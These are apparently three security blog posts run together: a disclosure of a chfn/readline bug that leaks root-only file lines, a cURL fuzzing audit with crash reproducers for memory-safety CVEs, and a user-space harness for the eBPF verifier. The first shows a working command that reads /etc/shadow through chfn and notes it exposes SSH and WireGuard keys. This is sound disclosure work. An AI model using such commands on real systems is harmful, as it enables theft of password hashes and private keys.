If you’re playing along, be warned: logging all getenv calls is insanely noisy and leads to many tedious, repetitive, uninteresting, and repetitive results. After blowing through countless (like, 20) variations of LC_MESSAGES, SYSTEMD_IGNORE_USERDB, SYSTEMD_IGNORE_CHROOT and friends, I came across INPUTRC, which is used somewhere in the chfn command. Intuiting that INPUTRC refers to a configuration file, I blindly passed INPUTRC=/etc/shadow to see what would happen…

$ INPUTRC=/etc/shadow chfn
Changing finger information for user.
readline: /etc/shadow: line 9: systemd-journal-remote: unknown key modifier
readline: /etc/shadow: line 10: systemd-network: unknown key modifier
readline: /etc/shadow: line 11: systemd-oom: unknown key modifier
readline: /etc/shadow: line 12: systemd-resolve: unknown key modifier
readline: /etc/shadow: line 13: systemd-timesync: unknown key modifier
readline: /etc/shadow: line 14: systemd-coredump: unknown key modifier
Office [b]: ^C

Hmmmmm. /etc/shadow? In my terminal? It’s more likely than you think.

Between the lines: root cause analysis

My first thought was to Google “INPUTRC.” Helpfully, the first result of my search gave me clues that it was related to the readline library. Indeed, by digging through the readline-8.1 source code, I found that “INPUTRC” is passed (via sh_get_env_value) as a parameter to getenv. Looks about right!

int rl_read_init_file (const char *filename) {
  // ...
  if (filename == 0)
    filename = sh_get_env_value ("INPUTRC");     // <- bingo
  // ...
}

Searching the readline codebase for the error message “unknown key modifier” that we saw earlier also turns up results. rl_read_init_file calls _rl_read_init_file, which routes to the rl_parse_and_bind function, which emits the error. From this call stack, we can deduce the error occurs when readline attempts to parse the input file—specifically, when it tries to interpret the file contents as a keybind configuration.

Let’s take it from the top. After skipping whitespace, _rl_read_init_file calls rl_parse_and_bind for each non-comment line in the input file. The rl_parse_and_bind function contains four error paths that lead to _rl_init_file_error, which prints the line currently being parsed. This is the root of the bug, as readline is not aware that it’s running with elevated privileges, and assumes it’s safe to print parts of the input file.

_rl_init_file_error is called with the argument string (the current line as the parser loops over the config file) on lines 1557, 1569, 1684, and 1759. Several other error paths can result in partial disclosure of the current line; they are omitted here for brevity. We will also skip looking at what would happen when passing binary files.

By examining the conditions required to reach the paths mentioned above, we can deduce the conditions under which we can leak lines from a file:

  1. We can leak a line that begins with a quotation mark and does not have a closing quotation mark:
    if (*string == '"') {
        i = _rl_skip_to_delim (string, 1, '"');
        /* If we didn't find a closing quote, abort the line. */
        if (string[i] == '\0') {
            _rl_init_file_error ("%s: no closing `\"' in key binding", string);
            return 1;
        }
        i++;    /* skip past closing double quote */
    }
    $ cat test
    "AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    readline: test: line 1: "AAAAA: no closing `"' in key binding
    Office [test]: ^C
  2. We can leak a line that starts with a colon and contains no whitespace or nulls:
    i = 0;
    // ...
    /* Advance to the colon (:) or whitespace which separates the two objects. */
    for (; (c = string[i]) && c != ':' && c != ' ' && c != '\t'; i++ );
    if (i == 0) {
        _rl_init_file_error ("`%s': invalid key binding: missing key sequence", string);
        return 1;
    }
    $ cat test
    :AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    readline: test: line 1: `:AAAAA: invalid key binding: missing key sequence
    Office [test]: ^C
  3. We can leak a line that does not contain a space, a tab, or a colon (or nulls):
    for (; (c = string[i]) && c != ':' && c != ' ' && c != '\t'; i++ );
    // ...
    foundsep = c != 0;
    // ...
    if (foundsep == 0) {
       _rl_init_file_error ("%s: no key sequence terminator", string);
       return 1;
    }
    $ cat test
    AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    readline: test: line 1: AAAAA: no key sequence terminator
    Office [test]: ^C

Happily, SSH keys match this third path, so we can stop here. Well, the juicy bits match, anyway: all the key data is typically Base64-encoded in a PEM container. We can also use this bug to read anything else that’s stored in a PEM container, such as certificate files, or that’s simply Base64-encoded, such as WireGuard keys.


The bug was introduced in version 2.30-rc1 in 2017, which makes it old enough to hit LTS releases. However, Debian, Red Hat, and Ubuntu have chfn provided by a different package, so they are unaffected. In the default configuration on Red Hat, /etc/login.defs doesn’t contain CHFN_RESTRICT; this omission prevents util-linux’s chfn from changing any user information, which would also kill the bug. Neither CentOS nor Fedora seems to have chfn installed by default in my testing, either.

Outside of chfn, then, how impactful is this? readline is quite well known, but our interest here is its use in SUID binaries. Running ldd on every SUID binary on my Arch box shows that the library is used only by chfn... How can we quickly determine a wider impact?

I first thought of scanning the package repositories, but unfortunately none of the web interfaces to the Debian, Ubuntu, Fedora, CentOS or Arch package repos provide file modes... This means we don’t have enough information to determine whether any binaries in a given package are SUID.

Sooo I mirrored the Debian and Arch repos for x86_64 and checked them by hand, assisted by some terrible shell scripts. The gist of that endeavor is that Arch is the only distro that has a package (util-linux) that contains a SUID executable (chfn) which loads readline by default. Oh well!

Side note: I totally fumbled reporting the CVE for this, so my name isn’t listed against the CVE with MITRE... RIP my career.

Don’t use readline in SUID applications

This was pretty much the result of an email chain sent to the Arch and Red Hat security teams, and to the package maintainer, who went ahead and removed readline support from chfn. The bug got patched like a year ago, so hopefully most affected users have updated by now.

Homework: go have a look at how many SUIDs use ncurses—atop on macOS, at least—and try messing with the TERMINFO environment variable... Let me know if you find anything :^)


Thank you to Karel Zak and to both the Arch and Red Hat security teams, who were all very helpful and expedient in rolling out fixes. Thank you also to disconnect3d for help and advice.


  • May 2, 2017: Bug introduced
  • December 31, 2020: g l o b a l     t i m e l i n e     r e s e t
  • February 8, 2022: Reported the bug to Arch and util-linux upstream
  • February 14, 2022: Bug fixed in util-linux upstream
  • March 28, 2022: Blog post about the discovery of the bug drafted
  • May 12, 2022: Blog post published internally
  • May 2022-Feb 2023: Procrastination^H Allowing time for updates to roll out
  • February 16, 2023: Blog post published


cURL audit: How a joke led to significant findings

By Maciej Domanski

In fall 2022, Trail of Bits audited cURL, a widely used command-line utility that transfers data to or from a server and supports various protocols. The project coincided with a Trail of Bits maker week, which meant that we had more manpower than usual, allowing us to take a nonstandard approach to the audit.

While discussing the threat model of the application, one of our team members jokingly asked, “Have we tried curl AAAAAAAAAA… yet?” Although the comment was made in jest, it sparked an idea: we should fuzz cURL’s command-line interface (CLI). Once we did so, the fuzzer quickly uncovered memory corruption bugs, specifically use-after-free issues, double-free issues, and memory leaks. Because the bugs are in libcurl, a cURL development library, they have the potential to affect the many software applications that use libcurl. This blog post describes how we found these vulnerabilities.

Working with cURL

cURL is continuously fuzzed by the OSS-Fuzz project, and its harnesses are developed in the separate curl-fuzzer GitHub repository. When I consulted the curl-fuzzer repository to check out the current state of cURL fuzzing, I noticed that cURL’s CLI arguments are not fuzzed. With that in mind, I decided to focus on testing cURL’s handling of arguments. I used the AFL++ fuzzer (a fork of AFL) to generate a large amount of random input data for cURL’s CLI. I compiled cURL using collision-free instrumentation at link time, with AddressSanitizer enabled, and then analyzed crashes that could indicate a bug.

cURL obtains its options through command-line arguments. As cURL follows the C89 standard, the main() function of a program can be defined with no parameters or with two parameters (argc and argv). The argc argument represents the number of command-line arguments passed to the program (which includes the program’s name). The argv argument is an array of pointers to the arguments passed to the program from the command line.

The standard also states that in a hosted environment, the main() function takes a third argument, char *envp[]; this argument points to a null-terminated array of pointers to char, each of which points to a string with information about the program’s environment.

The three parameters can have any name, as they are local to the function in which they are declared.

cURL’s main() function in the curl/src/tool_main.c file passes the command-line arguments to the operate() function, which parses them and sets up the global configuration of cURL. cURL then uses that global configuration to execute the operations.

Figure 1.1: cURL’s main() function (curl/src/tool_main.c#236–288)

Fuzzing argv

When I started the process of attempting to fuzz cURL, I looked for a way to use AFL to fuzz its argument parsing. My search led me to a quote from the creator of AFL (Michal Zalewski):

“AFL doesn’t support argv fuzzing because TBH, it’s just not horribly useful in practice. There is an example in experimental/argv_fuzzing/ showing how to do it in a general case if you really want to.”

I looked at that experimental AFL feature and its equivalent in AFL++. The argv fuzzing feature makes it possible to fuzz arguments passed to a program from the CLI, instead of through standard input. That can be useful when you want to cover multiple APIs of a library in fuzz testing, as you can fuzz the arguments of a tool that uses the library rather than writing multiple fuzz tests for each API.

How does the AFL++ argvfuzz feature work?

The argv-fuzz-inl.h header file of argvfuzz defines two macros that take input from the fuzzer and set up argv and argc:

  • The AFL_INIT_ARGV() macro initializes the argv array with the arguments passed to the program from the command line. It then reads the arguments from standard input and puts them in the argv array. The array is terminated by two NULL characters, and any empty parameter is encoded as a lone 0x02 character.
  • The AFL_INIT_SET0(_p) macro is similar to AFL_INIT_ARGV() but also sets the first element of the argv array to the value passed to it. This macro can be useful if you want to preserve the program’s name in the argv array.

Both macros rely on the afl_init_argv() function, which is responsible for reading a command line from standard input (by using the read() function in the unistd.h header file) and splitting it into arguments. The function then stores the resulting array of strings in a static buffer and returns a pointer to that buffer. It also sets the value pointed to by the argc argument to the number of arguments that were read.

To use the argv-fuzz feature, you need to include the argv-fuzz-inl.h header file in the file that contains the main() function and add a call to either AFL_INIT_ARGV or AFL_INIT_SET0 at the beginning of main(), as shown below:


Preparing a dictionary

A fuzzing dictionary file specifies the data elements that a fuzzing engine should focus on during testing. The fuzzing engine adjusts its mutation strategies so that it will process the tokens in the dictionary. In the case of cURL fuzzing, a fuzzing dictionary can help afl-fuzz more effectively generate valid test cases that contain options (which start with one or two dashes).

To fuzz cURL, I used the afl-clang-lto compiler’s autodictionary feature, which automatically generates a dictionary during compilation of the target binary. This dictionary is transferred to afl-fuzz on startup, improving its coverage. I also prepared a custom dictionary based on the cURL manpage and passed it to afl-fuzz via the -x parameter. I used the following Bash command to prepare the dictionary:

$ man curl | grep -oP '^\s*(--|-)\K\S+' | sed 's/[,.]$//' | sed 's/^/"&/; s/$/&"/'  | sort -u > curl.dict

Setting up a service for cURL connections

Initially, my focus was solely on CLI fuzzing. Still, I had to consider that each valid cURL command generated by the fuzzer would likely result in a connection to a remote service. To avoid connecting to real services while maintaining the ability to test the code responsible for handling connections, I used the netcat tool as a simulation of a remote service. First, I configured my machine to redirect outgoing traffic to netcat’s listening port.

I used the following command to run netcat in the background:

$ netcat -l 80 -k -w 0 &

The parameters indicate that the service should listen for incoming connections on port 80 (-l 80), continue to listen for additional connections after the current one is closed (-k), and immediately terminate the connection once it has been established (-w 0).

cURL is expected to connect to services using various hostnames, IP addresses, and ports. I needed to forward them all to one place: the previously created listener on TCP port 80.

To redirect all outgoing TCP packets to the local loopback address on port 80, I used the following iptables rule:

$ iptables -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 80

The command adds a new entry to the network address translation table in iptables. The -p option specifies the protocol (in this case, TCP), and the -j option specifies the rule’s target (in this case, REDIRECT). The --to-port option specifies the port to which the packets will be redirected (in this case, 80).

To ensure that all domain names would be resolved to the loopback IP address, I used the following iptables rule:

$ iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination

This rule adds a new entry to the NAT table, specifying the protocol (-p) as UDP, the destination port (--dport) as 53 (the default port for DNS), and the target (-j) as destination NAT. The --to-destination option specifies the address to which the packets will be redirected (in this case, the local loopback address).

This setup ensures that every cURL connection ends up at the local netcat listener.

Results analysis

The fuzzing process ran for a month on a 32-core machine with an Intel Xeon Platinum 8280 CPU @ 2.70GHz. The following bugs were identified during that time, most of them in the first few hours of fuzzing:

CVE-2022-42915 (Double free when using HTTP proxy with specific protocols)

Using cURL with a proxy connection and the dict, gopher, LDAP, or telnet protocol triggers a double-free vulnerability due to flaws in the error/cleanup handling. This issue is fixed in cURL 7.86.0.

To reproduce the bug, use the following command:

$ curl -x 0:80 dict://0

CVE-2022-43552 (Use after free when HTTP proxy denies tunneling SMB/TELNET protocols)

cURL can virtually tunnel supported protocols through an HTTP proxy. If an HTTP proxy blocks SMB or TELNET protocols, cURL may use a struct that has already been freed in its transfer shutdown code. This issue is fixed in cURL 7.87.0.

To reproduce the bug, use the following commands:

$ curl 0 -x0:80 telnet:/[j-u][j-u]//0 -m 01
$ curl 0 -x0:80 smb:/[j-u][j-u]//0 -m 01

TOB-CURL-10 (Use after free while using parallel option and sequences)

A use-after-free vulnerability can be triggered by using cURL with the parallel option (-Z), an unmatched bracket, and two consecutive sequences that create 51 hosts. cURL allocates memory blocks for error buffers, allowing up to 50 transfers by default. In the function responsible for handling errors, errors are copied to the appropriate error buffer when connections fail, and the memory is then freed. For the last (51st) transfer, a memory buffer is allocated and freed, and an error is then copied into the previously freed buffer. This issue is fixed in cURL 7.86.0.

To reproduce the bug, use the following command:

$ curl 0 -Z [q-u][u-~] }

TOB-CURL-11 (Unused memory blocks are not freed, resulting in memory leaks)

cURL allocates blocks of memory that are not freed when they are no longer needed, leading to memory leaks. This issue is fixed in cURL 7.87.0.

To reproduce the bug, use the following commands:

$ curl 0 -Z 0 -Tz 0
$ curl 00 --cu 00
$ curl --proto =0 --proto =0


If you want to learn about the full process of setting up a fuzzing harness and immediately begin fuzzing cURL’s CLI arguments, we have prepared a Dockerfile for you:

# syntax=docker/dockerfile:1
FROM aflplusplus/aflplusplus:4.05c

RUN apt-get update && apt-get install -y libssl-dev netcat iptables groff

# Clone a curl repository
RUN git clone && cd curl && git checkout 2ca0530a4d4bd1e1ccb9c876e954d8dc9a87da4a

# Apply a patch to use afl++ argv fuzzing feature
COPY <<-EOT /AFLplusplus/curl/curl_argv_fuzz.patch
		diff --git a/src/tool_main.c b/src/tool_main.c
		--- a/src/tool_main.c
		+++ b/src/tool_main.c
		@@ -54,6 +54,7 @@
		 #include "tool_vms.h"
		 #include "tool_main.h"
		 #include "tool_libinfo.h"
		+#include "../../AFLplusplus/utils/argv_fuzzing/argv-fuzz-inl.h"

		  * This is low-level hard-hacking memory leak tracking and similar. Using
		@@ -246,6 +247,8 @@ int main(int argc, char *argv[])
		   struct GlobalConfig global;
		   memset(&global, 0, sizeof(global));

		 #ifdef WIN32
		   /* Undocumented diagnostic option to list the full paths of all loaded
		      modules. This is purposely pre-init. */
EOT

# Apply a patch to use afl++ argv fuzzing feature
RUN cd curl && git apply curl_argv_fuzz.patch

# Compile a curl using collision-free instrumentation at link time and ASAN
RUN cd curl && \
	autoreconf -i && \
	CC="afl-clang-lto" CFLAGS="-fsanitize=address -g" ./configure --with-openssl --disable-shared && \
	make -j $(nproc) && \
	make install

# Download a dictionary
RUN wget

	# Running a netcat listener on port tcp port 80 in the background
	netcat -l 80 -k -w 0 &

	# Prepare iptables entries
	iptables-legacy -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 80
	iptables-legacy -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination

	# Prepare fuzzing directories
	mkdir fuzz &&
		  cd fuzz &&
		  mkdir in out &&
		  echo -ne 'curl\x00http://' > in/example_command.txt &&
		  # Run afl++ fuzzer
		  afl-fuzz -x /AFLplusplus/curl.dict -i in/ -o out/ -- curl

RUN chmod +x ./

Use the following commands to run this file:

$ docker buildx build -t curl_fuzz .
$ docker run --rm -it --cap-add=NET_ADMIN curl_fuzz

All joking aside

In summary, our approach demonstrates that fuzzing a CLI can be an effective supplementary technique for identifying vulnerabilities in software. Despite initial skepticism, our results yielded valuable insights. We believe this approach can improve the security of CLI-based tools, even ones that OSS-Fuzz has covered for many years.

It is possible to find heap-based memory corruption vulnerabilities in the cURL cleanup process. However, a use-after-free vulnerability may not be exploitable unless the freed data is used in the appropriate way and its content is attacker-controlled. A double-free vulnerability would require further allocations of a similar size and control over the stored data. Additionally, because the vulnerabilities are in libcurl, they can impact many different software applications that use libcurl in various ways, such as sending multiple requests or setting and cleaning up library resources within a single process.

It is also worth noting that although the attack surface for CLI exploitation is relatively limited, if an affected tool is a SUID binary, exploitation can result in privilege escalation (see CVE-2021-3156: Heap-Based Buffer Overflow in sudo).

To enhance the efficiency of fuzz testing similar tools in the future, we have extended the argv_fuzz feature in AFL++ by incorporating a persistent fuzzing mode. Learn more about it here.

Finally, our cURL audit reports are public. Check the audit report and the threat model.

Harnessing the eBPF Verifier

By Laura Bauman

During my internship at Trail of Bits, I prototyped a harness that improves the testability of the eBPF verifier, simplifying the testing of eBPF programs. My eBPF harness runs in user space, independently of any locally running kernel, and thus opens the door to testing of eBPF programs across different kernel versions.

eBPF enables users to instrument a running system by loading small programs into the operating system kernel. As a safety measure, the kernel “verifies” eBPF programs at load time and rejects any that it deems unsafe. However, using eBPF is a CI/CD nightmare, because there’s no way to know whether a given eBPF program will successfully load and pass verification without testing it on a running kernel.

My harness aims to eliminate that nightmare by executing the eBPF verifier outside of the running kernel. To use the harness, a developer tweaks my libbpf-based sample programs (hello.bpf.c and hello_loader.c) to tailor them to the eBPF program being tested. The version of libbpf provided by my harness links against a “kernel library” that implements the actual bpf syscall, which provides isolation from the running kernel. The harness works well with kernel version 5.18, but it is still a proof of concept; enabling support for other kernel versions and additional eBPF program features will require a significant amount of work.

With great power comes great responsibility

eBPF is an increasingly powerful technology that is used to increase system observability, implement security policies, and perform advanced networking operations. For example, the osquery open-source endpoint agent uses eBPF for security monitoring, to enable organizations to watch process and file events happening across their fleets.

The ability to inject eBPF code into the running kernel seems like either a revelation or a huge risk to the kernel’s security, integrity, and dependability. But how on earth is it safe to load user-provided code into the kernel and execute it there? The answer to this question is twofold. First, eBPF isn’t “normal” code, and it doesn’t execute in the same way as normal code. Second, eBPF code is algorithmically “verified” to be safe to execute.

eBPF isn’t normal code

eBPF (extended Berkeley Packet Filter) is an overloaded term that refers to both a specialized bytecode representation of programs and the in-kernel VM that runs those bytecode programs. eBPF is an extension of classic BPF, which has fewer features than eBPF (e.g., two registers instead of ten), uses an in-kernel interpreter instead of a just-in-time compiler, and focuses only on network packet filtering.

User applications can load eBPF code into kernel space and run it there without modifying the kernel’s source code or loading kernel modules. Loaded eBPF code is checked by the kernel’s eBPF verifier, which tries to prove that the code will terminate without crashing.

The picture above shows the general interaction between user space and kernel space, which occurs through the bpf syscall. The eBPF program is represented in eBPF bytecode, which can be obtained through the Clang back end. The interaction begins when a user space process executes the first in the series of bpf syscalls used to load an eBPF program into the kernel. The kernel then runs the verifier, which enforces constraints that ensure the eBPF program is valid (more on that later). If the verifier approves the program, the verifier will finalize the process of loading it into the kernel, and it will run when it is triggered. The program will then serve as a socket filter, listening on a socket and forwarding only information that passes the filter to user space.

Verifying eBPF

The key to eBPF safety is the eBPF verifier, which limits the set of valid eBPF programs to those that it can guarantee will not harm the kernel or cause other issues. This means that eBPF is, by design, not Turing-complete.

Over time, the set of eBPF programs accepted by the verifier has expanded, though the testability of that set of programs has not. The following quote from the “BPF Design Q&A” section of the Linux kernel documentation is telling:

The [eBPF] verifier is steadily getting ‘smarter.’ The limits are being removed. The only way to know that the program is going to be accepted by the verifier is to try to load it. The BPF development process guarantees that the future kernel versions will accept all BPF programs that were accepted by the earlier versions.

This “development process” relies on a limited set of regression tests that can be run through the kselftest system. These tests require that the version of the source match that of the running kernel and are aimed at kernel developers; the barrier to entry for others seeking to run or modify such tests is high. As eBPF is increasingly relied upon for critical observability and security infrastructure, it is concerning that the Linux kernel eBPF verifier is a single point of failure that is fundamentally difficult to test.

Trust but verify

The main problem facing eBPF is portability—that is, it is notoriously difficult to write an eBPF program that will pass the verifier and work correctly on all kernel versions (or, heck, on even one). The introduction of BPF Compile Once-Run Everywhere (CO-RE) has significantly improved eBPF program portability, though issues still remain. BPF CO-RE relies on the eBPF loader library (libbpf), the Clang compiler, and the eBPF Type Format (BTF) information in the kernel. In short, BPF CO-RE means that an eBPF program can be compiled on one Linux kernel version (e.g., by Clang), modified to match the configuration of another kernel version, and loaded into a kernel of that version (through libbpf) as though the eBPF bytecode had been compiled for it.

However, different kernel versions have different verifier limits and support different eBPF opcodes. This makes it difficult (from an engineering perspective) to tell whether a particular eBPF program will run on a kernel version other than the one it has been tested on. Moreover, different configurations of the same kernel version will also have different verifier behavior, so determining a program’s portability requires testing the program on all desired configurations. This is not practical when building CI infrastructure or trying to ship a production piece of software.

Projects that use eBPF take a variety of approaches to overcoming its portability challenges. For projects that primarily focus on tracing syscalls (like osquery and opensnoop), BPF CO-RE is less necessary, since syscall arguments are stable between kernel versions. In those cases, the limiting factor is the variations in verifier behavior. Osquery chooses to place strict constraints on its eBPF programs; it does not take advantage of modern eBPF verifier support for structures such as bounded loops and instead continues to write eBPF programs that would be accepted by the earliest verifiers. Other projects, such as SysmonForLinux, maintain multiple versions of eBPF programs for different kernel versions and choose a program version dynamically, during compilation.

What is the eBPF verifier?

One of the key benefits of eBPF is the guarantee it provides: that the loaded code will not crash the kernel, will terminate within a time limit, and will not leak information to unprivileged user processes. To ensure that code can be injected into the kernel safely and effectively, the Linux kernel’s eBPF verifier places restrictions on the abilities of eBPF programs. The name of the verifier is slightly misleading, because although it aims to enforce restrictions, it does not perform formal verification.

The verifier performs two main passes over the code. The first pass is handled by the check_cfg() function, which ensures that the program is guaranteed to terminate by performing an iterative depth-first search of all possible execution paths. The second pass (done in the do_check() function) involves static analysis of the bytecode; this pass ensures that all memory accesses are valid, that types are used consistently (e.g., scalar values are never used as pointers), and that the number of branches and total instructions is within certain complexity limits.
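The termination check in the first pass boils down to hunting for back edges in the program's control-flow graph. The toy model below is our own illustrative C (the function names and graph encoding are invented, and it uses recursion where the kernel's check_cfg() is iterative), but it captures the core idea: an edge that points back to an instruction still on the DFS stack means the program can loop.

```c
#define MAX_INSNS 16

/* succ[i][j] != 0 means instruction j is a successor of instruction i. */
static int succ[MAX_INSNS][MAX_INSNS];
static int n_insns;

/* DFS colors, as in the kernel's check_cfg(): white = unvisited,
 * gray = currently on the exploration stack, black = fully explored. */
enum { WHITE, GRAY, BLACK };

static int has_back_edge(int node, int color[])
{
    color[node] = GRAY;
    for (int next = 0; next < n_insns; next++) {
        if (!succ[node][next])
            continue;
        if (color[next] == GRAY)   /* edge back into the stack: a loop */
            return 1;
        if (color[next] == WHITE && has_back_edge(next, color))
            return 1;
    }
    color[node] = BLACK;
    return 0;
}

/* Returns 1 if the "program" (entry at instruction 0) contains a loop,
 * which early verifiers rejected unconditionally. */
static int reject_for_loop(void)
{
    int color[MAX_INSNS] = { WHITE };
    return has_back_edge(0, color);
}
```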

As mentioned earlier in the post, the constraints that the verifier enforces have changed over time. For example, eBPF programs were limited to a maximum of 4,096 instructions until kernel version 5.2, which increased that number to 1 million. Kernel version 5.3 introduced the ability for eBPF programs to use bounded loops. Note, though, that the verifier will always be backward compatible in that all future versions of the verifier will accept any eBPF program accepted by older versions of the verifier.
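Those version-dependent limits can be summarized in a few lines of C. The helper names and version encoding below are ours, but the numbers come straight from the paragraph above:

```c
/* Encode a kernel version so versions compare numerically, e.g. 5.2 -> 502.
 * (Illustrative only; the kernel uses KERNEL_VERSION() macros.) */
static int kver(int major, int minor) { return major * 100 + minor; }

/* Instruction-count limit: 4,096 before kernel 5.2, 1 million after. */
static int insn_limit(int v) { return v >= kver(5, 2) ? 1000000 : 4096; }

/* Bounded loops were first accepted by the verifier in kernel 5.3. */
static int allows_bounded_loops(int v) { return v >= kver(5, 3); }
```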

Alarmingly, the ability to load eBPF programs into the kernel is not always restricted to root users or processes with the CAP_SYS_ADMIN capability. In fact, the initial plan for eBPF included support for unprivileged users, requiring the verifier to disallow the sharing of kernel pointers with user programs and to perform constant blinding. In the wake of several privilege escalation vulnerabilities affecting eBPF, most Linux distributions have disabled support for unprivileged users by default. However, overriding the default still creates a risk of crippling privilege escalation attacks.

Regardless of whether eBPF is restricted to privileged users, flaws in the verifier cannot be tolerated if eBPF is to be relied upon for security-critical functionality. As explained in an article, at the end of the day, “[the verifier] is 2000 lines or so of moderately complex code that has been reviewed by a relatively small number of (highly capable) people. It is, in a real sense, an implementation of a blacklist of prohibited behaviors; for it to work as advertised, all possible attacks must have been thought of and effectively blocked. That is a relatively high bar.” While the code may have been reviewed by highly capable people, the verifier is still a complex bit of code embedded in the Linux kernel that lacks a cohesive testing framework. Without thorough testing, there is a risk that the backward compatibility principle could be violated or that entire classes of potentially insecure programs could be allowed through the verifier.

Enabling rigorous testing of the eBPF verifier

Given that the eBPF verifier is the foundation of critical infrastructure, it should be analyzed through a rigorous testing process that can be easily integrated into CI workflows. Kernel selftests and example eBPF programs that require a running Linux kernel for every kernel version are inadequate.

The eBPF verifier harness aims to allow testing on various kernel versions without any dependence on the locally running kernel version or configuration. In other words, the harness allows the verifier (the verifier.c file) to run in user space.

Compiling only a portion of the kernel source code for execution in user space is difficult because of the monolithic nature of the kernel and the kernel-specific idioms and functionality. Luckily, the task of eBPF verification is limited in scope, and many of the involved functions and files are consistent across kernel versions. Thus, stubbing out kernel-specific functions for user space alternatives makes it possible to run the verifier in isolation. For instance, because the verifier expects to be called from within a running kernel, it calls kernel-specific memory allocation functions when it is allocating memory. When it is run within the harness, it calls user space memory allocation functions instead.

The harness is not the first tool that aims to improve the verifier’s testability. The IO Visor Project’s BPF fuzzer has a very similar goal of running the verifier in user space and enabling efficient fuzzing—and the tool has found at least one bug. But there is one main difference between the eBPF harness and similar existing solutions: the harness is intended to support all kernel versions, making it easy to compare the same eBPF program across kernel versions. The harness leaves the true kernel functionality as intact as possible to maintain an execution environment that closely approximates a true kernel context.

System design

The harness consists of the following main components:

  • Linux source code (in the form of a Git submodule)
  • A LibBPF mirror (also a Git submodule)
  • header_stubs.h (which enables certain kernel functions and macros to be overridden or excluded altogether)
  • Harness source code (i.e., implementations of stubbed-out kernel functions)

The architecture of the eBPF verifier harness.

At a high level, the harness runs a sample eBPF program through the verifier by using standard libbpf conventions in sample.bpf.c and calling bpf_object__load() in sample_loader.c. The libbpf code runs as normal (e.g., probing the “kernel” to see what operations are supported, autocreating maps if configured to do so, etc.), but instead of invoking the actual bpf() syscall and trapping to the running kernel, it executes a harness “syscall” and continues running within the harnessed kernel.
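The key trick, swapping the real bpf(2) syscall for an in-process implementation, can be pictured as a function-pointer indirection: libbpf's call site stays the same, but the pointer is aimed at the harnessed kernel instead of trapping into the running one. The sketch below is illustrative C of our own; the harness's actual mechanism, types, and names differ.

```c
#include <stddef.h>

/* Simplified stand-ins for the real syscall's command and attributes. */
enum bpf_cmd_sim { SIM_BPF_PROG_LOAD };
struct bpf_attr_sim { size_t insn_cnt; };

/* In a harness build, the "syscall" runs entirely in user space and
 * invokes the harnessed verifier; here it just pretends to. */
static long harness_bpf(enum bpf_cmd_sim cmd, struct bpf_attr_sim *attr)
{
    if (cmd == SIM_BPF_PROG_LOAD)
        return attr->insn_cnt > 0 ? 3 : -1;   /* fake fd 3 on success */
    return -1;
}

/* The indirection point: a kernel build would aim this at the real bpf(2). */
static long (*bpf_syscall)(enum bpf_cmd_sim, struct bpf_attr_sim *) = harness_bpf;

static long load_prog(size_t insn_cnt)
{
    struct bpf_attr_sim attr = { .insn_cnt = insn_cnt };
    return bpf_syscall(SIM_BPF_PROG_LOAD, &attr);
}
```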

Compiling a portion of the Linux kernel involves making a lot of decisions on which source files should be included and which should be stubbed out. For example, the kernel frequently calls the kmalloc() and kfree() functions for dynamic memory allocation. Because the verifier is running in user space, these functions can be replaced with user space versions like malloc() and free(). Kernel code also includes a lot of synchronization primitives that are not necessary in the harness, since the harness is a single-threaded application; those primitives can also safely be stubbed out.
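A stub header in the spirit described above might look like the following. This is an illustrative fragment we wrote, not the harness's actual header_stubs.h:

```c
#include <stdlib.h>

/* User space stand-ins for kernel allocation primitives. The gfp_t
 * flags argument is accepted and ignored. */
typedef unsigned int gfp_t;
#define GFP_KERNEL 0

static void *kmalloc(size_t size, gfp_t flags) { (void)flags; return malloc(size); }
static void *kzalloc(size_t size, gfp_t flags) { (void)flags; return calloc(1, size); }
static void kfree(void *ptr) { free(ptr); }

/* Synchronization primitives become no-ops: the harness is single-threaded. */
#define spin_lock(l)   do { (void)(l); } while (0)
#define spin_unlock(l) do { (void)(l); } while (0)
```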

Other kernel functionality is more difficult to efficiently replace. For example, getting the harness to work required finding a way to simulate the Linux kernel Virtual File System. This was necessary because the verifier is responsible for ensuring the safe use of eBPF maps, which are identified by file descriptors. To simulate operations on file descriptors, the harness must also be able to simulate the creation of files associated with the descriptors.

A demonstration

So how does the harness actually work? What do the sample programs look like? Below is a simple eBPF program that contains a bounded loop; verifier support for bounded loops was introduced in kernel version 5.3, so all kernel versions older than 5.3 should reject the program, and all versions newer than 5.3 should accept it. Let’s run it through the harness and see what happens!


#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

int handle_tp(void *ctx)
{
    for (int i = 0; i < 3; i++) {
        bpf_printk("Hello World.\n");
    }
    return 0;
}

char LICENSE[] SEC("license") = "Dual BSD/GPL";

Using the harness requires compiling each eBPF program into eBPF bytecode; once that’s done, a “loader” program calls the libbpf functions that handle the setup of the bpf syscalls. The loader program looks something like the program shown below, but it can be tweaked to allow for different configuration and setup options (e.g., to disable the autocreation of maps).


#include <stdio.h>
#include <stdarg.h>
#include "bounded_loop.skel.h"

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) {
    return vfprintf(stderr, format, args);
}

int load() {
    struct bounded_loop_bpf *obj;
    int err = 0;

    libbpf_set_print(libbpf_print_fn);

    obj = bounded_loop_bpf__open();
    if (!obj) {
        fprintf(stderr, "failed to open BPF object.\n");
        return 1;
    }

    // this function invokes the verifier
    err = bpf_object__load(*obj->skeleton->obj);

    // free memory allocated by libbpf functions
    bounded_loop_bpf__destroy(obj);
    return err;
}
Compiling the sample program with the necessary portions of Linux source code, libbpf, and the harness runtime produces an executable that will run the verifier and report whether the program passes verification.

The output of bounded_loop.bpf.c when run through version 5.18 of the verifier.

Looking forward

The harness is still a proof of concept, and several aspects of it will need to be improved before it can be used in production. For instance, to fully support all eBPF map types, the harness will need the ability to fully stub out additional kernel-level memory allocation primitives. The harness will also need to reliably support all versions of the verifier between 3.15 and the latest version. Implementing that support will involve manually accounting for differences in the internal kernel application programming interfaces (APIs) between these versions and adjusting stubbed-out subsystems as necessary. Lastly, more cohesive organization of the stubbed-out functions, as well as thorough documentation on their organization, would make it much easier to distinguish between unmodified kernel code and functions that have been stubbed out with user space alternatives.

